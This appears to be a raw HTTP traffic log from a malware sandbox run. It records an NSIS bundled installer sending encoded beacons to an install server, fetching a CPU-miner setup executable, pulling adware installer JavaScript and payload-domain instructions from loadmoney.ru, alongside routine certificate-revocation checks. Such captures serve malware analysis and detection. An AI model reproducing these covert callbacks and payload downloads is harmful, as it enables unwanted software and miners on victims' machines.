GET /ii?alpha=Bj59QGU6aDIwbQspUmpqB3ouTWUGYnFoaCMGPBQqWTssQDETAnBWV1UlP1ZXC24hS05FXkoEclhBeBFxA2oEXhNsIj1UfVdjbkUzeShSbWoFcxRCb1N7KW4nZhMoD38BGidXEic2YDMJAA58QjRZXmUdGgZNDkNWGzgvHwYEaQlIFH5heVFnQSRmRzB7OxUuY1ogcw85ET4oP2ZmBCpUC0IwLA81GwIhaUlRajUTYihqJ3MUB0gNQjkTOiwcbQJtBEISfmtqAx8IMWYgU2xhSGouBHd2dmBOb3d7JmxAeQZkUjZlQD8QBCh0BnklMgRrGXcuUQlhEU0WeF17PBtjYyleFkYrf2YDPQY+ezsganhebCQdfSUBMwA9Nj17d1Z/A2lDOmMQOQAXbXZaVydxTCRbNngDRkUUQhxwF01ySy9aKFlQCw1iZhg2A3IIAWE+a0g3cRpkdhUvTjloMSxmATkPcABzIFZiRR8sOwsEdmRGPl8uchcYDEgSSCAeLmxDJw4dUBxQPSprAz4Jbx87XwRPHXo4GXF2ZUp/RVkqMTRdGX8+US10SnA1PzpnSVFsBx92Hm0pSQllWHAxRGMoWEUwWHt1FVUxb2pKIwxvfRBuKTMKOC1JIw86ag9uWUk= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 30 Apr 2015 23:07:14 GMT
Content-Length: 84
9lqmClH8AOQOJOk5m3YQ8BfkHk7yVeEHI/9WwFpR4k64QEapeOMgY gK51lD6R30Cj/8co1UT6cmk/h0QTb/....
POST /if?alpha=Bj59QGUAMTN5CB4JUmpqB3ouTWUGYnFoaCMGPBQqWTssQDETAnBWV1UlP1ZXC24hS05FXkoEclhBeBFxA2oEXhNsIj1UfVdjbkUzeShSbWoFcxRCb1N7KW4nZhMoD38BGidXEic2YDMJAA58QjRZXmUdGgZNDkNWGzgvHwYEaQlIFH5pbFEADzc3GUkkZ09VPhh+GFZgVGhwKjg2XXsUPw1tIVdlTUJ5KAkMYmFHMVorewNNUx5hAHgXYXlUM180QxUFPGlpLiEIBGZEMGQ+FSdlRCJlED8VOSkqMiUPA10qDQpCQD8QBjR2XgkbOBhgBW87CQkATA4Qfl4uc181VikMPUo7fmAfPAEmeyJpJGpUaSRUJWtxe09tfX8mKQ8hUyUQETFGJgYAPm9UWmxrVjJEKWYSHwZJAwFyWH51TyYTK1ATSHg2L119V3Q0BmwrYFwjEhp1J0h6SCswWTspFCpWaWMrcBI1EFtraE0JeHcYNholMQNIQEUaQjsbOC4KLlJmAUAZbTw1WWVdYGpPMHs0DCpxBH0vHE9BZ2tpcyQPIlx0dBFOKBFFFiJrWAkIEilKKz4sURRgNVQTZU8kPHoORDpDFQMOZX0YJgY+eyYgGU1oV3cwezhKKWRubmU2JQQiZhEPUGk= HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Content-Length: 78
Connection: Keep-Alive
Cache-Control: no-cache
alpha=Bj59QGV0PEtiFVgoeCQLIWEuU3p8anxhCQEQP3YoRD5NKj8AEyFab1EhISptBn8hSjoHGEcf
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 30 Apr 2015 23:07:14 GMT
Content-Length: 84
9lqmClH8AOQOJOk5m3YQ8BfkHk7yVeEHI/9WwFpR4k64QEapeOMgY gK51lD6R30Cj/8co1UT6cmk/h0QTb/HTTP/1.1 200 OK..Cache-Control: no-cache, no-store..Pragma: no-cache..Content-Type: text/plain; charset=utf-8..Expires: -1..Server: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..SVR: SP001C2..X-Powered-By: ASP.NET..p3p: CP="CAO PSA OUR"..Date: Thu, 30 Apr 2015 23:07:14 GMT..Content-Length: 41..{"status":"OK","url":null,"message":null}..
GET /pki/crl/products/microsoftrootcert.crl HTTP/1.1
Cache-Control: max-age = 900
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 24 Mar 2015 05:02:25 GMT
If-None-Match: "a1132b8ef65d01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com
HTTP/1.1 304 Not Modified
Content-Type: application/pkix-crl
Last-Modified: Tue, 24 Mar 2015 05:02:25 GMT
ETag: "a1132b8ef65d01:0"
Cache-Control: max-age=900
Date: Thu, 30 Apr 2015 23:11:47 GMT
Connection: keep-alive
HTTP/1.1 304 Not Modified..Content-Type: application/pkix-crl..Last-Modified: Tue, 24 Mar 2015 05:02:25 GMT..ETag: "a1132b8ef65d01:0"..Cache-Control: max-age=900..Date: Thu, 30 Apr 2015 23:11:47 GMT..Connection: keep-alive..
GET /pki/crl/products/MicCodSigPCA_08-31-2010.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com
HTTP/1.1 200 OK
Content-Type: application/pkix-crl
Last-Modified: Tue, 14 Apr 2015 05:02:07 GMT
Accept-Ranges: bytes
ETag: "2711f7277076d01:0"
Server: Microsoft-IIS/8.5
VTag: 279782516600000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Length: 554
Cache-Control: max-age=900
Date: Thu, 30 Apr 2015 23:12:18 GMT
Connection: keep-alive
0..&0......0...*.H........0y1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1#0!..U....Microsoft Code Signing PCA..150413163223Z..150713045223Z.a0_0...U.#..0..........X..7.3...L...0... .....7.........0...U......Z0... .....7......150712164223Z0...*.H.............WK....e.\.-.n......./......."]..E!.. //=...[....w... ..........#...[.l.J..f|..... .s......w...J._.......3.[..#.z....ko.I..Q{....e.nV......F..d}..rF\H.jlH]dQ.E....x......W............j....&L. 2.$.?...X?.#.(.....pK.v.......y..r....t......=.AW......K.G.gJD.b...
GET /mobile/mt-core.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.mobimidia.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:07:07 GMT
Server: Apache
Last-Modified: Fri, 04 Mar 2011 18:46:26 GMT
ETag: "1448627-161ce-49dac90326480"
Accept-Ranges: bytes
Content-Length: 90574
Connection: close
Content-Type: application/x-javascript
/*.---.MooTools: the javascript framework..web build:. - hXXp://mootools.net/core/7c56cfef9dddcf170a5d68e3fb61cfd7..packager build:. - packager build Core/Core Core/Array Core/String Core/Number Core/Function Core/Object Core/Event Core/Browser Core/Class Core/Class.Extras Core/Slick.Parser Core/Slick.Finder Core/Element Core/Element.Style Core/Element.Event Core/Element.Dimensions Core/Fx Core/Fx.CSS Core/Fx.Tween Core/Fx.Morph Core/Fx.Transitions Core/Request Core/Request.HTML Core/Request.JSON Core/Cookie Core/JSON Core/DOMReady Core/Swiff..copyrights:. - [MooTools](hXXp://mootools.net)..licenses:. - [MIT License](http://mootools.net/license.txt).....*/.(function(){this.MooTools={version:"1.3.1",build:"af48c8d589f43f32212f9bb8ff68a127e6a3ba6c"};var e=this.typeOf=function(i){if(i==null){return"null";}if(i.$family){return i.$family();.}if(i.nodeName){if(i.nodeType==1){return"element";}if(i.nodeType==3){return(/\S/).test(i.nodeValue)?"textnode":"whitespace";}}else{if(typeof i.length=="number"){if(i.callee){return"arguments";.}if("item" in i){return"collection";}}}return typeof i;};var u=this.instanceOf=function(w,i){if(w==null){return false;}var v=w.$constructor||w.constructor;.while(v){if(v===i){return true;}v=v.parent;}return w instanceof i;};var f=this.Function;var r=true;for(var q in {toString:1}){r=null;}if(r){r=["hasOwnProperty","valueOf","isPrototypeOf","propertyIsEnumerable","toLocaleString","toString","constructor"];.}f.prototype.overloadSetter=function(v){var i=this;return function(x,w){if(x==null){
<<< skipped >>>
GET /CPUminer/cpuminer-x11opt-setup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:07:08 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1427702688"
Last-Modified: Mon, 30 Mar 2015 08:04:48 GMT
Cache-Control: max-age=73285
Content-Length: 2586343
Content-Type: application/octet-stream
X-HW: 1430435229.dop007.am4.t,1430435228.cds054.am4.c
Content-Disposition: attachment; filename="cpuminer-x11opt-setup.exe"
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....n3T.................\...........0.......p....@..........................@............@..................................s...........B...........................................................................p...............................text...|Z.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc....B.......D...v..............@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....6B..H.P.u..u..u....r@..B...SV.5.6B..E.WP.u....r@..e...E..E.P.u....r@..}..e....Lp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Tp@..E...E.P.E.P.u....r@..u....E..9}...w....~X.te.v4..Dp@....E.tU.}.j.W.E......E.......@p@..vXW..Hp@..u..5<p@.W...E..E.h ...Pj.h..B.W...r@..u.W...u....E.P.u...\r@._^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.
<<< skipped >>>
GET /V19/amipb.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.amoninst.com/index.php
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: cdn1.lawfuldownload.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Length: 61399
Connection: keep-alive
Date: Fri, 24 Apr 2015 08:51:14 GMT
Last-Modified: Thu, 19 Feb 2015 14:37:18 GMT
ETag: "52bb6eb78bfd9436ad34be6fc97eae8c"
Accept-Ranges: bytes
Server: AmazonS3
Age: 61933
X-Cache: Hit from cloudfront
Via: 1.1 1215b20e825091002cc9421604422697.cloudfront.net (CloudFront)
X-Amz-Cf-Id: xvLGUt83RdPMDlFA2UmHO8rLncLUKhDgc5SLuQQXMezdvUXxw9WTfg==
..//<!-- ../* Progress bar */..var g_AmiPbs = new Array();..var g_AmiPbsEx = new Array();..var g_interval = 0;..var g_initComp = 0;..var g_possibleComps = [];..var g_reportedComps = [];..var g_removedComps = [];....function LogMessage(message) {.. try {.. g_ami.Log(message);.. }.. catch (excpt) { }..}..function IsDeclined(name) {.. var declined = 0;.. for (var i = 0; i < g_removedComps.length; i ) {.. if (g_removedComps[i] == name) {.. declined = 1;.. break;.. }.. }.. return declined;..}..function UpdateSkipStatus(sn) {.. if (g_testa && !ArrayContains(g_notest, sn) && !ArrayContains(g_notest1, sn)) {.. if (g_testa.constructor != Array || ArrayContains(g_testa, sn)) {.. g_ami.WriteProfileString(g_testf, '', sn, 'S');.. }.. }..}..function ShortNameFromName(name) {.. for (c = 0; c < g_comps.length; c ) {.. if (g_comps[c].name == name) {.. return g_comps[c].sn;.. }.. }.. return name;..}..function UpdateComponentsStatus() {.. LogMessage('UpdateComponentsStatus function started');.. for (var j = 0; j < g_possibleComps.length; j ) {.. var reported = 0;.. if (g_possibleComps[j].sn == 'updater') {.. continue;.. }.. for (var i = 0; i < g_reportedComps.length; i ) {.. if (g_reportedComps[i].sn == g_possibleComps[j].sn) {.. reported = 1;.. break;.. }.. }.. if
<<< skipped >>>
GET /v4/sof-installer/MAS_WIN7X64_adm_1FEBFBFF000306C3?action=pcm.chromesyn.exist HTTP/1.1
Accept: text/html, application/xhtml xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:39 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
Content-Encoding: gzip
57.............V*.I,)V.R..V.Q*..M.....L.r......... .....T.C......<............T..Z.K...H.....0..
GET /get_info?pid=7718 HTTP/1.1
Accept: */*
Host: loadmoney.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: text/html
Content-Length: 70
Connection: keep-alive
X-Powered-By: PHP/5.4.40
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 30 Apr 2015 23:07:08 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: guest_sess_id=g-a79ad5449bfbd23a1412336daed149245542; expires=Fri, 01-May-2015 23:07:08 GMT; path=/; domain=loadmoney.ru
{"rfr":"openpart","dmn":"horses.profsummer.ru","bin_dmn":"brbshop.ru"}HTTP/1.1 200 OK..Server: nginx..Date: Thu, 30 Apr 2015 23:07:08 GMT..Content-Type: text/html..Content-Length: 70..Connection: keep-alive..X-Powered-By: PHP/5.4.40..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Last-Modified: Thu, 30 Apr 2015 23:07:08 GMT..Cache-Control: no-cache, must-revalidate..Pragma: no-cache..Set-Cookie: guest_sess_id=g-a79ad5449bfbd23a1412336daed149245542; expires=Fri, 01-May-2015 23:07:08 GMT; path=/; domain=loadmoney.ru..{"rfr":"openpart","dmn":"horses.profsummer.ru","bin_dmn":"brbshop.ru"}..
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFIA5aolVvwahu2WydRLM8c= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1762
content-transfer-encoding: binary
Cache-Control: max-age=329046, public, no-transform, must-revalidate
Last-Modified: Mon, 27 Apr 2015 18:34:46 GMT
Expires: Mon, 4 May 2015 18:34:46 GMT
Date: Thu, 30 Apr 2015 23:12:11 GMT
Connection: keep-alive
0..........0..... .....0......0...0......;O}a.!..u...au..eUNp..20150427183446Z0s0q0I0... ...................B.>.I.$&.....e......0..C9...313..R...%V.......K3.....20150427183446Z....20150504183446Z0...*.H.............<........4Tl |..2e....".....7..\.|........H...LdiH..C.#=ty.A.m2."......,....F..eK.H...t.C...Ak.y...M4.d..n.N..X.Jn...^....:...~.}R.b..k]....E.]...&...0?.]....8..*E8..1'E:a<..~N.....A...=...d.6...7..._..R..G.....A%h.0jN.H....`u...^.YX.DW\3$.yG..g..BW....!......0...0...0...........2...'U.BM...g.B0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 Public Primary Certification Authority - G50...141202000000Z..151216235959Z0..1.0...U....US1.0...U....Symantec Corporation1.0...U....Symantec Trust Network1?0=..U...6Symantec Class 3 PCA - G5 OCSP Responder Certificate 30.."0...*.H.............0...............2&..PL...,..2....:..tH...`JG.%..*...s.c%...?t..J..0.q....~..k@X.l.i....0..kk..h.9"1.5?..s.....3[...u......]...R0..Z}....l..I.Y.....j\H.q...#.uw.4qz.#.J.....@2$"..$l.B.......D.ye..(..2.........@...... ...."... E..0M,..b{.^..s'....f.6.pr4.J........'j..........0...0...U.......0.0l..U. .e0c0a..`.H...E....0R0&.. .........hXXp://VVV.symauth.com/cps0(.. .......0...hXXp://VVV.symauth.com/rpa0...U.%..0... .......0...U...........0... .....0......0!..U....0...0.1.0...U....TGV-B-2760...U......;O}a.!..u...au..eUNp0...U.#..0.....e......0..C9...3130...*.H.............(.&..Dgr.Ve..#...5
<<< skipped >>>
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEALa8SdwQh28+NjkQGqVhx8= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1725
content-transfer-encoding: binary
Cache-Control: max-age=561798, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 11:15:29 GMT
Expires: Thu, 7 May 2015 11:15:29 GMT
Date: Thu, 30 Apr 2015 23:12:11 GMT
Connection: keep-alive
0..........0..... .....0......0...0......N$p...v....1.;..vn....20150430111529Z0s0q0I0... ...................F....0.yV......{&.K......&..........'pB.....@j.......20150430111529Z....20150507111529Z0...*.H..............9K....i...{.-.?j.L...Y{:.;G<Xq>a.........p..f..N...F.Ki>*.l...FzN...*JT...YJ]...2.K.....\.=.Y.LG....L..@.;..^.PS.Gs....'KJ...8......jE#U1}._.HV...)q_Y<}'t........f(.l .W$....#U....G...q.D...2.K...L.../...m.t....,.gHk~y..$X.....RH7|.^..h=...uV)..".............0...0...0............F...I]A(M..s@.0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,..U...%VeriSign Class 3 Code Signing 2010 CA0...150225000000Z..150526235959Z0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1VeriSign Class 3 Code Signing 2010 OCSP Responder0.."0...*.H.............0.........q<...A...#......A...u..Lz.............o..D.vQ%..s.......f....e../jI.d.W.....|K;.j5...#.B%.]..~S.... .|;S.&.....N..`...5.....!D.p....M/.. ..;j...q..`6...2.Ck..BnLHvCZn%....,.w.Ooi..z'...\.Yx......b..L...5.o..o..{..}.........%e.....N..._i........*Bc....:yQg.........0...0...U....0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://www.verisign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS incorp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...U........0... .....0......0"..U....0...0.1.0...U....TGV-B-31830...*.H..............-..^.........f.P`...s.....8.....V.......... .... B.
<<< skipped >>>
GET /root.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.globalsign.net
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:57 GMT
Content-Type: application/x-pkcs7-crl
Content-Length: 649
Connection: keep-alive
Set-Cookie: __cfduid=d9646b74727c3a81fb354a8417669753a1430435517; expires=Fri, 29-Apr-16 23:11:57 GMT; path=/; domain=.globalsign.net; HttpOnly
Expires: Wed, 15 Jul 2015 00:00:00 GMT
Last-Modified: Mon, 23 Mar 2015 00:00:00 GMT
Cache-Control: public, max-age=6482883
CF-Cache-Status: HIT
Accept-Ranges: bytes
Server: cloudflare-nginx
CF-RAY: 1df6edc007da0f4b-FRA
0...0..m...0...*.H........0W1.0...U....BE1.0...U....GlobalSign nv-sa1.0...U....Root CA1.0...U....GlobalSign Root CA..150323000000Z..150715000000Z0..0*.........D.....141125000000Z0.0...U.......0*........)E.....141125000000Z0.0...U.......0*........ ...h..141125000000Z0.0...U.......0*........,^.....141125000000Z0.0...U......../0-0...U......00...U.#..0...`{f.E....P/}..4....K0...*.H.............&...f#...5.[4........{pV.#.F........:...*Q.....Mx9}....,.S.D.>@.Ju.[)c...`.?.j~...-..{.FHj.....#.C2.[.,`.......)...Bj2........n...........%......p.6......Q.....1..pd......F.........mJO.!y.W.......V.M).N.R.....V..|...7.ry. ..gy..I\.........j....... .z.E..".HTTP/1.1 200 OK..Date: Thu, 30 Apr 2015 23:11:57 GMT..Content-Type: application/x-pkcs7-crl..Content-Length: 649..Connection: keep-alive..Set-Cookie: __cfduid=d9646b74727c3a81fb354a8417669753a1430435517; expires=Fri, 29-Apr-16 23:11:57 GMT; path=/; domain=.globalsign.net; HttpOnly..Expires: Wed, 15 Jul 2015 00:00:00 GMT..Last-Modified: Mon, 23 Mar 2015 00:00:00 GMT..Cache-Control: public, max-age=6482883..CF-Cache-Status: HIT..Accept-Ranges: bytes..Server: cloudflare-nginx..CF-RAY: 1df6edc007da0f4b-FRA..0...0..m...0...*.H........0W1.0...U....BE1.0...U....GlobalSign nv-sa1.0...U....Root CA1.0...U....GlobalSign Root CA..150323000000Z..150715000000Z0..0*.........D.....141125000000Z0.0...U.......0*........)E.....141125000000Z0.0...U.......0*........ ...h..141125000000Z0.0...U.......0*........,^.....141125000000Z0.0...U......../0-0...U......00...U.#..0...`{f.E....P/}..4....K0.
<<< skipped >>>
POST /ocsp HTTP/1.1
Host: clients1.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Connection: keep-alive
Content-Length: 107
0i0g0E0C0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.
.sR'..i..0.0... .....0...0... .....0..
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 30 Apr 2015 23:07:21 GMT
Expires: Mon, 04 May 2015 23:07:21 GMT
Cache-Control: public, max-age=345600
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic,p=1
0..........0..... .....0......0...0......J......h.v....b..Z./..20150430131328Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./....sR'..i....20150430131328Z....20150507131328Z0...*.H.............m..f.....~.A.$.o....q.\.F.B..........k.-.cL".u..../.l..KW...(.,..X1.v-....3CD..N.....d..(a.,u..S...-.I.F.Nv..:....{..2..g{.i....S.Vr]..8.P"t'.......O....T.k#<S&..=....].-8.{~ls.,Oie.in...N..~...|!..N%....@....,ck.Z....,E....."...C].#...............nzN....AHTTP/1.1 200 OK..Content-Type: application/ocsp-response..Date: Thu, 30 Apr 2015 23:07:21 GMT..Expires: Mon, 04 May 2015 23:07:21 GMT..Cache-Control: public, max-age=345600..Server: ocsp_responder..Content-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options: SAMEORIGIN..Alternate-Protocol: 80:quic,p=1..0..........0..... .....0......0...0......J......h.v....b..Z./..20150430131328Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./....sR'..i....20150430131328Z....20150507131328Z0...*.H.............m..f.....~.A.$.o....q.\.F.B..........k.-.cL".u..../.l..KW...(.,..X1.v-....3CD..N.....d..(a.,u..S...-.I.F.Nv..:....{..2..g{.i....S.Vr]..8.P"t'.......O....T.k#<S&..=....].-8.{~ls.,Oie.in...N..~...|!..N%....@....,ck.Z....,E....."...C].#...............nzN....A....
<<< skipped >>>
POST /ocsp HTTP/1.1
Host: clients1.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Connection: keep-alive
Content-Length: 107
0i0g0E0C0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.....F......0.0... .....0...0... .....0..
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Thu, 30 Apr 2015 23:07:21 GMT
Expires: Mon, 04 May 2015 23:07:21 GMT
Cache-Control: public, max-age=345600
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic,p=1
0..........0..... .....0......0...0......J......h.v....b..Z./..20150430130944Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.....F........20150430130944Z....20150507130944Z0...*.H.............<....B&.;. ..U....D./;...x..Ai....,..|..e(......4_'Y,..f.....{p.vDL.g..w...\.q\.SdO..1..=....lwux?IEG.)A.}..._..Zg.l0...zk...I....%O.j.....e...-.........d.a.%.;.......G......B.l....J.]..R..(.$L..o..._....2...'..........}=......J. ....I...|@zj..._J(.... ...HTTP/1.1 200 OK..Content-Type: application/ocsp-response..Date: Thu, 30 Apr 2015 23:07:21 GMT..Expires: Mon, 04 May 2015 23:07:21 GMT..Cache-Control: public, max-age=345600..Server: ocsp_responder..Content-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options: SAMEORIGIN..Alternate-Protocol: 80:quic,p=1..0..........0..... .....0......0...0......J......h.v....b..Z./..20150430130944Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.....F........20150430130944Z....20150507130944Z0...*.H.............<....B&.;. ..U....D./;...x..Ai....,..|..e(......4_'Y,..f.....{p.vDL.g..w...\.q\.SdO..1..=....lwux?IEG.)A.}..._..Zg.l0...zk...I....%O.j.....e...-.........d.a.%.;.......G......B.l....J.]..R..(.$L..o..._....2...'..........}=......J. ....I...|@zj..._J(.... .....
<<< skipped >>>
GET /msdownload/update/v3/static/trustedr/en/D69B561148F01C77C54578C10926DF5B856976AD.crt?675a91727ba9c962 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com
HTTP/1.1 200 OK
Content-Type: application/x-x509-ca-cert
Last-Modified: Fri, 20 Feb 2015 20:14:50 GMT
Accept-Ranges: bytes
ETag: "05934e1494dd01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 867
Date: Thu, 30 Apr 2015 23:11:56 GMT
Connection: keep-alive
0.._0..G.............!XS..0...*.H........0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1.0...U....GlobalSign0...090318100000Z..290318100000Z0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1.0...U....GlobalSign0.."0...*.H.............0.........%v.y.x".......(...v....r.F.C....._$..K.`.F.R...Gpl.d...,...=. .......y.;..w...I.jb/.^..h..'.8...>..&Y.s....&.....[...`.I.(.i;...(....aW7.t..t.:.r/.......=...3.. .S.:.s..A. :......O..2`.W....hh.8&`u..w..... I..@.H..1a.^....w.d.z._....b..l.Ti....n...qv.i.........B0@0...U...........0...U.......0....0...U........K...E$.MP.c.......0...*.H.............K@..P.......TEI....A.....(.3.k.t...-..........sgJ..D{x..nlo.).39E....Wl.....S.-.$l..c..ShgV>...5!..h....S......]F...zX(./....7A..Dm.S(.~.g.........L'.L.ssv.....z..-....,.<.U...~6..WI...-|`..AQ.#...2k.....,3.:;%..@.;,.x.a/....Uo.....M.(.r..bPe.....1....GX?_HTTP/1.1 200 OK..Content-Type: application/x-x509-ca-cert..Last-Modified: Fri, 20 Feb 2015 20:14:50 GMT..Accept-Ranges: bytes..ETag: "05934e1494dd01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Content-Length: 867..Date: Thu, 30 Apr 2015 23:11:56 GMT..Connection: keep-alive..0.._0..G.............!XS..0...*.H........0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1.0...U....GlobalSign0...090318100000Z..290318100000Z0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1.0...U....GlobalSign0.."0...*.H.............0.........%v.y.x".......(...v....r.F.C....._$..K.`.F.R...Gpl.d...,...=. .......y.;..w...I.jb/.^..h..'.8...>..&Y.s....&.
<<< skipped >>>
GET /root-r3.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.globalsign.net
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:56 GMT
Content-Type: application/x-pkcs7-crl
Content-Length: 594
Connection: keep-alive
Set-Cookie: __cfduid=d25feb04b850f57981ac8c792aba941aa1430435516; expires=Fri, 29-Apr-16 23:11:56 GMT; path=/; domain=.globalsign.net; HttpOnly
Expires: Wed, 15 Jul 2015 00:00:00 GMT
Last-Modified: Mon, 23 Mar 2015 00:00:00 GMT
Cache-Control: public, max-age=6482884
CF-Cache-Status: HIT
Accept-Ranges: bytes
Server: cloudflare-nginx
